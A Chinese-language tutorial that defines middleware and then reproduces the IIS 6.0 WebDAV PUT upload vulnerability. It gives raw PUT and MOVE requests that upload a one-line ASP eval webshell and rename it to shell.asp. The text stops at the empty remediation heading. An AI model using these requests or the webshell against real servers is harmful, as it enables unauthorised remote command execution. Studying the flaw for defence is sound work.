中介軟體

中介軟體是介於應用系統和系統軟體之間的一類軟體，它使用系統軟體所提供的基礎服務（功能），銜接網路上應用系統的各個部分或不同的應用，能夠達到資源共享、功能共享的目的。它並沒有很嚴格的定義，但是普遍接受IDC的定義：中介軟體是一種獨立的系統軟體服務程式，分散式應用軟體藉助這種軟體在不同的技術之間共享資源，中介軟體位於客戶機伺服器的作業系統之上，管理計算資源和網路通訊。從這個意義上可以用一個等式來表示中介軟體：中介軟體=平臺+通訊，這也就限定了只有用於分散式系統中才能叫中介軟體，同時也把它與支撐軟體和實用軟體區分開來。

常見的中介軟體有

• iis
• apache
• tomacat
• Zookeeper
• nginx
• jboss
• Jetty
• Zookeeper
• weblogic
• websphere
• Glassfish
• ......

這一篇只講iis6.x其中的幾個

1.1 PUT漏洞

1.漏洞描述

IIS Server 在 Web 服務擴充套件中開啟了 WebDAV ，配置了可以寫入的許可權，造成任意檔案上傳。

版本：IIS 6.0

2.漏洞復現

可以看到它支援的協議，其中是支援PUT協議的

我們就可以上傳一個文字

1 PUT /test.txtHTTP/1.1
 
2 Host:upload.moonteam.com 
3 Content-Length:25
4 
5 <%evalrequest("cmd")%>

傳送，回顯201

表示插入成功了，因為是不可以直接上傳asp的，所有要把剛剛上傳上去的檔案修改其後綴

使用下面的命令進行修改後綴為asp。

MOVE/test.txtHTTP/1.1
Host:upload.moonteam.com
Destination:http://www.xxx.com/shell.asp

這裡要有空格

回顯201表示成功，shell.asp寫入成功，使用工具可以直接getshell

3.漏洞修復